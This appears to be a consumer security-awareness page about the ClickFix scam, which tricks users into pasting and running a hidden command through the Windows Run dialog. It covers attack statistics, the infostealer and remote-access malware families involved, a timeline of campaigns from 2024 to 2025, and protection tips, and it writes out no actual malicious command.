What is ClickFix?

ClickFix is a scam that tricks you into running malicious code on your own computer. It works by making you think your browser or computer has a problem that needs fixing.

The Key Trick:

Instead of downloading a file, ClickFix tells you to:

  1. Press Windows + R (opens a system command window)
  2. Press Ctrl + V (pastes a hidden command)
  3. Press Enter (runs the malicious code)

Because you're the one pressing the keys, your computer's security software often doesn't stop it.

How Big is the Problem?

517%
Increase in ClickFix attacks in early 2025 (ESET)
400%
Growth in malicious ClickFix URLs from 2024 to 2025 (Proofpoint)
#2
Most common attack method after phishing (ESET, 2025)

What Happens When You Run It?

The malicious code executes immediately and installs "infostealer" malware that silently:

  • Steals all saved passwords from your browser
  • Hijacks your active sessions (steals login cookies)
  • Drains cryptocurrency wallets found on the device
  • Captures screenshots of your data

Common Malware Families Used

These attacks typically distribute notorious malware families including:

  • Lumma Stealer (LummaC2) - The most common. Steals passwords, cookies, and crypto wallets.
  • Vidar Stealer - Similar to Lumma, focuses on browser data and crypto.
  • DarkGate - A "Remote Access Trojan" that gives attackers full control of your computer.
  • AsyncRAT / DCRAT - Tools that let attackers spy on you and control your PC remotely.

See What a ClickFix Attack Looks Like

We've created a safe, educational simulation that shows you exactly what happens during a ClickFix attack. No actual malware is involved.

Try the Interactive Demo

Timeline: How ClickFix Evolved

March 2024
First Major Campaigns

Proofpoint and Microsoft detect TA571 and Storm-1811 using ClickFix techniques in the wild.

May 2024
ClearFake Adoption

The "ClearFake" cybercrime cluster adopts ClickFix, injecting fake browser updates into compromised sites.

Aug 2024
Google Meet & Mac Variants

Groups like "Slavic Nation Empire" launch fake Google Meet campaigns targeting both Windows and macOS.

Early 2025
Massive Surge

Attacks increase by over 500% in H1 2025, becoming the second most common attack method globally.

How to Protect Yourself

  • Never paste commands from websites into your computer's Run dialog or terminal
  • Be suspicious of "fix" instructions that involve keyboard shortcuts
  • Check the URL - Real error messages don't come from random websites
  • When in doubt, close the tab and navigate to the site directly